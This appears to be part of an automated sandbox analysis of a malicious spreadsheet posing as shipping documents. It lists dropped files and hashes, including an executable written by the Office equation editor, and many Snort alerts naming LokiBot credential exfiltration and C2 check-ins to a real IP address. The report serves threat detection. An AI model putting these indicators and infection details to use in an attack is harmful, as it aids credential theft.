                    Entropy (8bit):2.8123097603136196
                    Encrypted:false
                    SSDEEP:3072:234UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:44UcLe0JOcXuunhqcS
                    MD5:27E280B8E3E495E1824A39E0A2C1FA21
                    SHA1:B4CC1FCD9FF12A0DFA0C58D05EADDA92BD5C3EEA
                    SHA-256:DF2ED56094DC6AA5C2AF4974C2B1D93843E4DBE4627A7C18719B7A1025C4022A
                    SHA-512:94F203A4C6258DA1479C4906D9434280B59BCDA4644F31F3723313473966AE2A215EE1D206C9EC33FA5558ABF0F417680CA999B08F643ADAAB073D09889B624C
                    Malicious:false
                    Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................2X$........f<X.@F.%...\...................RQ.Y............l.......$Q.Y........ ...Id<X........ ............d<X........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X.......0....84X........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F23CC993.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):65050
                    Entropy (8bit):7.959940260382877
                    Encrypted:false
                    SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                    MD5:22335141D285E599CDAEF99EABA59D5B
                    SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                    SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                    SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                    Malicious:false
                    Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD34C19.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):33795
                    Entropy (8bit):7.909466841535462
                    Encrypted:false
                    SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                    MD5:613C306C3CC7C3367595D71BEECD5DE4
                    SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                    SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                    SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                    Malicious:false
                    Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                    C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)
                    Process:C:\Users\Public\vbc.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):210432
                    Entropy (8bit):6.97232515193582
                    Encrypted:false
                    SSDEEP:3072:2v+ArX9FLxOhanZBsX3PovEuKwEXLqfP6GB6klGfLIQVNWBz:6+KnIanZyHPoqqfSGB6k8Txql
                    MD5:59A67B5CCF01B6A564265797DC5E53E8
                    SHA1:996281D368FCC2CEFE5BF99399CCB19299C6F8FF
                    SHA-256:E4C1C0121487F83B014B8C81BBAF03DB0B7F49584A268A5E67CA64BA6E64676F
                    SHA-512:3BEB988E323C9A9F8DEB04E845DA157E34EC1F564B5CF8681A7ACA490A9FB5A1D4F1D4A10D80AD2D9C7D1742C56B93CFD113352FA80E38C4BAB46695C6F527CD
                    Malicious:false
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L...H..`.................l........................@.................................mk..................................O...,...<.... ...u..............................................................@...............|............................text... j.......l.................. ..`.rdata...1.......2...p..............@..@.data...|U..........................@....rsrc....u... ...v..................@..@........................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
                    Process:C:\Users\Public\vbc.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview: 1
                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                    Process:C:\Users\Public\vbc.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):25990
                    Entropy (8bit):0.6027050180179753
                    Encrypted:false
                    SSDEEP:12:seeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeJ:C
                    MD5:53580B7E5732A1219D4DA536B8FA2999
                    SHA1:9680D4CD528EECA7693619772320868789C3C4E4
                    SHA-256:F15B8D65C47C425332F15BB045DE3273C99AD53782D5F18333ACB8D60FF83418
                    SHA-512:E9F9B4F89D99034CEEB3D2F0D5D47F589818D8DD84F29FA9ACBD69DE120FF5D569853994B2EE88B08D240CD9BDD493AA3B79FED65F73B2AAAB43E9BF8A20474D
                    Malicious:false
                    Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................
                    C:\Users\user\Desktop\~$Original shipping documents.xlsx
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):330
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                    Malicious:false
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    C:\Users\Public\vbc.exe
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):210432
                    Entropy (8bit):6.97232515193582
                    Encrypted:false
                    SSDEEP:3072:2v+ArX9FLxOhanZBsX3PovEuKwEXLqfP6GB6klGfLIQVNWBz:6+KnIanZyHPoqqfSGB6k8Txql
                    MD5:59A67B5CCF01B6A564265797DC5E53E8
                    SHA1:996281D368FCC2CEFE5BF99399CCB19299C6F8FF
                    SHA-256:E4C1C0121487F83B014B8C81BBAF03DB0B7F49584A268A5E67CA64BA6E64676F
                    SHA-512:3BEB988E323C9A9F8DEB04E845DA157E34EC1F564B5CF8681A7ACA490A9FB5A1D4F1D4A10D80AD2D9C7D1742C56B93CFD113352FA80E38C4BAB46695C6F527CD
                    Malicious:true
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L...H..`.................l........................@.................................mk..................................O...,...<.... ...u..............................................................@...............|............................text... j.......l.................. ..`.rdata...1.......2...p..............@..@.data...|U..........................@....rsrc....u... ...v..................@..@........................................................................................................................................................................................................................................................................................................................................................

                    Static File Info

                    General

                    File type:CDFV2 Encrypted
                    Entropy (8bit):7.988412488949302
                    TrID:
                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                    File name:Original shipping documents.xlsx
                    File size:420472
                    MD5:27eb25e6fbbbd37115055ecc4b557c53
                    SHA1:4c986607a941900d9d8804aa351dcab0cc4de224
                    SHA256:09d2b8f86f136cb14832e9a4de582c239c698044adcc8d12d6195f5eff78ccab
                    SHA512:f2ece9c11a33e9bf9502f231a89e08256da67e1387b2707e76045fe51d3d0cc3e81d05a1bd2e380d39adbc0cefe8d60113b96b647813c64b7f1bded81ae230d2
                    SSDEEP:6144:fQOdpdVnGAWCDj4TvvuX2sNNtN+Por6ouj38cawe5kA0t8+yWENL/XfOmPKI:4O7cvCbNtUzP3jmiA06+l6Xf5
                    File Content Preview:........................>......................................................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2aa8aa4b4bcb4

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    09/28/21-06:50:29.583742TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916680192.168.2.225.188.89.50
                    09/28/21-06:50:29.583742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916680192.168.2.225.188.89.50
                    09/28/21-06:50:29.583742TCP2025381ET TROJAN LokiBot Checkin4916680192.168.2.225.188.89.50
                    09/28/21-06:50:29.583742TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916680192.168.2.225.188.89.50
                    09/28/21-06:50:30.225629TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916780192.168.2.225.188.89.50
                    09/28/21-06:50:30.225629TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916780192.168.2.225.188.89.50
                    09/28/21-06:50:30.225629TCP2025381ET TROJAN LokiBot Checkin4916780192.168.2.225.188.89.50
                    09/28/21-06:50:30.225629TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916780192.168.2.225.188.89.50
                    09/28/21-06:50:30.788969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916880192.168.2.225.188.89.50
                    09/28/21-06:50:30.788969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916880192.168.2.225.188.89.50
                    09/28/21-06:50:30.788969TCP2025381ET TROJAN LokiBot Checkin4916880192.168.2.225.188.89.50
                    09/28/21-06:50:30.788969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916880192.168.2.225.188.89.50
                    09/28/21-06:50:31.149317TCP2025483ET TROJAN LokiBot Fake 404 Response80491685.188.89.50192.168.2.22
                    09/28/21-06:50:31.556288TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14916980192.168.2.225.188.89.50
                    09/28/21-06:50:31.556288TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916980192.168.2.225.188.89.50
                    09/28/21-06:50:31.556288TCP2025381ET TROJAN LokiBot Checkin4916980192.168.2.225.188.89.50
                    09/28/21-06:50:31.556288TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24916980192.168.2.225.188.89.50
                    09/28/21-06:50:31.912452TCP2025483ET TROJAN LokiBot Fake 404 Response80491695.188.89.50192.168.2.22
                    09/28/21-06:50:33.578149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917080192.168.2.225.188.89.50
                    09/28/21-06:50:33.578149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917080192.168.2.225.188.89.50
                    09/28/21-06:50:33.578149TCP2025381ET TROJAN LokiBot Checkin4917080192.168.2.225.188.89.50
                    09/28/21-06:50:33.578149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917080192.168.2.225.188.89.50
                    09/28/21-06:50:33.930838TCP2025483ET TROJAN LokiBot Fake 404 Response80491705.188.89.50192.168.2.22
                    09/28/21-06:50:36.333900TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917180192.168.2.225.188.89.50
                    09/28/21-06:50:36.333900TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917180192.168.2.225.188.89.50
                    09/28/21-06:50:36.333900TCP2025381ET TROJAN LokiBot Checkin4917180192.168.2.225.188.89.50
                    09/28/21-06:50:36.333900TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917180192.168.2.225.188.89.50
                    09/28/21-06:50:36.694551TCP2025483ET TROJAN LokiBot Fake 404 Response80491715.188.89.50192.168.2.22
                    09/28/21-06:50:36.981514TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917280192.168.2.225.188.89.50
                    09/28/21-06:50:36.981514TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917280192.168.2.225.188.89.50
                    09/28/21-06:50:36.981514TCP2025381ET TROJAN LokiBot Checkin4917280192.168.2.225.188.89.50
                    09/28/21-06:50:36.981514TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917280192.168.2.225.188.89.50
                    09/28/21-06:50:37.329350TCP2025483ET TROJAN LokiBot Fake 404 Response80491725.188.89.50192.168.2.22
                    09/28/21-06:50:37.611743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917380192.168.2.225.188.89.50
                    09/28/21-06:50:37.611743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917380192.168.2.225.188.89.50
                    09/28/21-06:50:37.611743TCP2025381ET TROJAN LokiBot Checkin4917380192.168.2.225.188.89.50
                    09/28/21-06:50:37.611743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917380192.168.2.225.188.89.50
                    09/28/21-06:50:37.968483TCP2025483ET TROJAN LokiBot Fake 404 Response80491735.188.89.50192.168.2.22
                    09/28/21-06:50:38.271242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917480192.168.2.225.188.89.50
                    09/28/21-06:50:38.271242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917480192.168.2.225.188.89.50
                    09/28/21-06:50:38.271242TCP2025381ET TROJAN LokiBot Checkin4917480192.168.2.225.188.89.50
                    09/28/21-06:50:38.271242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917480192.168.2.225.188.89.50
                    09/28/21-06:50:38.657722TCP2025483ET TROJAN LokiBot Fake 404 Response80491745.188.89.50192.168.2.22
                    09/28/21-06:50:38.967765TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917580192.168.2.225.188.89.50
                    09/28/21-06:50:38.967765TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917580192.168.2.225.188.89.50
                    09/28/21-06:50:38.967765TCP2025381ET TROJAN LokiBot Checkin4917580192.168.2.225.188.89.50
                    09/28/21-06:50:38.967765TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917580192.168.2.225.188.89.50
                    09/28/21-06:50:39.323179TCP2025483ET TROJAN LokiBot Fake 404 Response80491755.188.89.50192.168.2.22
                    09/28/21-06:50:39.638770TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917680192.168.2.225.188.89.50
                    09/28/21-06:50:39.638770TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917680192.168.2.225.188.89.50
                    09/28/21-06:50:39.638770TCP2025381ET TROJAN LokiBot Checkin4917680192.168.2.225.188.89.50
                    09/28/21-06:50:39.638770TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917680192.168.2.225.188.89.50
                    09/28/21-06:50:40.025614TCP2025483ET TROJAN LokiBot Fake 404 Response80491765.188.89.50192.168.2.22
                    09/28/21-06:50:40.313216TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917780192.168.2.225.188.89.50
                    09/28/21-06:50:40.313216TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917780192.168.2.225.188.89.50
                    09/28/21-06:50:40.313216TCP2025381ET TROJAN LokiBot Checkin4917780192.168.2.225.188.89.50
                    09/28/21-06:50:40.313216TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917780192.168.2.225.188.89.50
                    09/28/21-06:50:40.677573TCP2025483ET TROJAN LokiBot Fake 404 Response80491775.188.89.50192.168.2.22
                    09/28/21-06:50:40.962632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917880192.168.2.225.188.89.50
                    09/28/21-06:50:40.962632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917880192.168.2.225.188.89.50
                    09/28/21-06:50:40.962632TCP2025381ET TROJAN LokiBot Checkin4917880192.168.2.225.188.89.50
                    09/28/21-06:50:40.962632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917880192.168.2.225.188.89.50
                    09/28/21-06:50:41.324284TCP2025483ET TROJAN LokiBot Fake 404 Response80491785.188.89.50192.168.2.22
                    09/28/21-06:50:41.640230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917980192.168.2.225.188.89.50
                    09/28/21-06:50:41.640230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917980192.168.2.225.188.89.50
                    09/28/21-06:50:41.640230TCP2025381ET TROJAN LokiBot Checkin4917980192.168.2.225.188.89.50
                    09/28/21-06:50:41.640230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917980192.168.2.225.188.89.50
                    09/28/21-06:50:42.012145TCP2025483ET TROJAN LokiBot Fake 404 Response80491795.188.89.50192.168.2.22
                    09/28/21-06:50:42.299756TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918080192.168.2.225.188.89.50
                    09/28/21-06:50:42.299756TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918080192.168.2.225.188.89.50
                    09/28/21-06:50:42.299756TCP2025381ET TROJAN LokiBot Checkin4918080192.168.2.225.188.89.50
                    09/28/21-06:50:42.299756TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918080192.168.2.225.188.89.50
                    09/28/21-06:50:42.665060TCP2025483ET TROJAN LokiBot Fake 404 Response80491805.188.89.50192.168.2.22
                    09/28/21-06:50:42.959616TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918180192.168.2.225.188.89.50
                    09/28/21-06:50:42.959616TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918180192.168.2.225.188.89.50
                    09/28/21-06:50:42.959616TCP2025381ET TROJAN LokiBot Checkin4918180192.168.2.225.188.89.50
                    09/28/21-06:50:42.959616TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918180192.168.2.225.188.89.50
                    09/28/21-06:50:43.342382TCP2025483ET TROJAN LokiBot Fake 404 Response80491815.188.89.50192.168.2.22
                    09/28/21-06:50:43.668918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918280192.168.2.225.188.89.50
                    09/28/21-06:50:43.668918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918280192.168.2.225.188.89.50
                    09/28/21-06:50:43.668918TCP2025381ET TROJAN LokiBot Checkin4918280192.168.2.225.188.89.50
                    09/28/21-06:50:43.668918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918280192.168.2.225.188.89.50
                    09/28/21-06:50:44.033988TCP2025483ET TROJAN LokiBot Fake 404 Response80491825.188.89.50192.168.2.22
                    09/28/21-06:50:44.317407TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918380192.168.2.225.188.89.50
                    09/28/21-06:50:44.317407TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918380192.168.2.225.188.89.50
                    09/28/21-06:50:44.317407TCP2025381ET TROJAN LokiBot Checkin4918380192.168.2.225.188.89.50
                    09/28/21-06:50:44.317407TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918380192.168.2.225.188.89.50
                    09/28/21-06:50:44.690879TCP2025483ET TROJAN LokiBot Fake 404 Response80491835.188.89.50192.168.2.22
                    09/28/21-06:50:44.980669TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918480192.168.2.225.188.89.50
                    09/28/21-06:50:44.980669TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918480192.168.2.225.188.89.50
                    09/28/21-06:50:44.980669TCP2025381ET TROJAN LokiBot Checkin4918480192.168.2.225.188.89.50
                    09/28/21-06:50:44.980669TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918480192.168.2.225.188.89.50
                    09/28/21-06:50:45.327651TCP2025483ET TROJAN LokiBot Fake 404 Response80491845.188.89.50192.168.2.22
                    09/28/21-06:50:45.606333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918580192.168.2.225.188.89.50
                    09/28/21-06:50:45.606333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918580192.168.2.225.188.89.50
                    09/28/21-06:50:45.606333TCP2025381ET TROJAN LokiBot Checkin4918580192.168.2.225.188.89.50
                    09/28/21-06:50:45.606333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918580192.168.2.225.188.89.50
                    09/28/21-06:50:45.970264TCP2025483ET TROJAN LokiBot Fake 404 Response80491855.188.89.50192.168.2.22
                    09/28/21-06:50:46.257926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918680192.168.2.225.188.89.50
                    09/28/21-06:50:46.257926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918680192.168.2.225.188.89.50
                    09/28/21-06:50:46.257926TCP2025381ET TROJAN LokiBot Checkin4918680192.168.2.225.188.89.50
                    09/28/21-06:50:46.257926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918680192.168.2.225.188.89.50
                    09/28/21-06:50:46.621851TCP2025483ET TROJAN LokiBot Fake 404 Response80491865.188.89.50192.168.2.22
                    09/28/21-06:50:46.934038TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918780192.168.2.225.188.89.50
                    09/28/21-06:50:46.934038TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918780192.168.2.225.188.89.50
                    09/28/21-06:50:46.934038TCP2025381ET TROJAN LokiBot Checkin4918780192.168.2.225.188.89.50
                    09/28/21-06:50:46.934038TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918780192.168.2.225.188.89.50
                    09/28/21-06:50:47.284598TCP2025483ET TROJAN LokiBot Fake 404 Response80491875.188.89.50192.168.2.22
                    09/28/21-06:50:47.567338TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918880192.168.2.225.188.89.50
                    09/28/21-06:50:47.567338TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918880192.168.2.225.188.89.50
                    09/28/21-06:50:47.567338TCP2025381ET TROJAN LokiBot Checkin4918880192.168.2.225.188.89.50
                    09/28/21-06:50:47.567338TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918880192.168.2.225.188.89.50
                    09/28/21-06:50:47.929216TCP2025483ET TROJAN LokiBot Fake 404 Response80491885.188.89.50192.168.2.22
                    09/28/21-06:50:48.217751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918980192.168.2.225.188.89.50
                    09/28/21-06:50:48.217751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918980192.168.2.225.188.89.50
                    09/28/21-06:50:48.217751TCP2025381ET TROJAN LokiBot Checkin4918980192.168.2.225.188.89.50
                    09/28/21-06:50:48.217751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918980192.168.2.225.188.89.50
                    09/28/21-06:50:48.600374TCP2025483ET TROJAN LokiBot Fake 404 Response80491895.188.89.50192.168.2.22
                    09/28/21-06:50:48.901348TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919080192.168.2.225.188.89.50
                    09/28/21-06:50:48.901348TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919080192.168.2.225.188.89.50
                    09/28/21-06:50:48.901348TCP2025381ET TROJAN LokiBot Checkin4919080192.168.2.225.188.89.50
                    09/28/21-06:50:48.901348TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919080192.168.2.225.188.89.50
                    09/28/21-06:50:49.275072TCP2025483ET TROJAN LokiBot Fake 404 Response80491905.188.89.50192.168.2.22
                    09/28/21-06:50:49.543983TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919180192.168.2.225.188.89.50
                    09/28/21-06:50:49.543983TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919180192.168.2.225.188.89.50
                    09/28/21-06:50:49.543983TCP2025381ET TROJAN LokiBot Checkin4919180192.168.2.225.188.89.50
                    09/28/21-06:50:49.543983TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919180192.168.2.225.188.89.50
                    09/28/21-06:50:49.910859TCP2025483ET TROJAN LokiBot Fake 404 Response80491915.188.89.50192.168.2.22
                    09/28/21-06:50:50.201147TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919280192.168.2.225.188.89.50
                    09/28/21-06:50:50.201147TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919280192.168.2.225.188.89.50
                    09/28/21-06:50:50.201147TCP2025381ET TROJAN LokiBot Checkin4919280192.168.2.225.188.89.50
                    09/28/21-06:50:50.201147TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919280192.168.2.225.188.89.50
                    09/28/21-06:50:50.559416TCP2025483ET TROJAN LokiBot Fake 404 Response80491925.188.89.50192.168.2.22
                    09/28/21-06:50:50.837246TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919380192.168.2.225.188.89.50
                    09/28/21-06:50:50.837246TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919380192.168.2.225.188.89.50
                    09/28/21-06:50:50.837246TCP2025381ET TROJAN LokiBot Checkin4919380192.168.2.225.188.89.50
                    09/28/21-06:50:50.837246TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919380192.168.2.225.188.89.50
                    09/28/21-06:50:51.200425TCP2025483ET TROJAN LokiBot Fake 404 Response80491935.188.89.50192.168.2.22
                    09/28/21-06:50:51.664554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919480192.168.2.225.188.89.50
                    09/28/21-06:50:51.664554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919480192.168.2.225.188.89.50
                    09/28/21-06:50:51.664554TCP2025381ET TROJAN LokiBot Checkin4919480192.168.2.225.188.89.50
                    09/28/21-06:50:51.664554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919480192.168.2.225.188.89.50
                    09/28/21-06:50:52.034303TCP2025483ET TROJAN LokiBot Fake 404 Response80491945.188.89.50192.168.2.22
                    09/28/21-06:50:52.442627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919580192.168.2.225.188.89.50
                    09/28/21-06:50:52.442627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919580192.168.2.225.188.89.50
                    09/28/21-06:50:52.442627TCP2025381ET TROJAN LokiBot Checkin4919580192.168.2.225.188.89.50
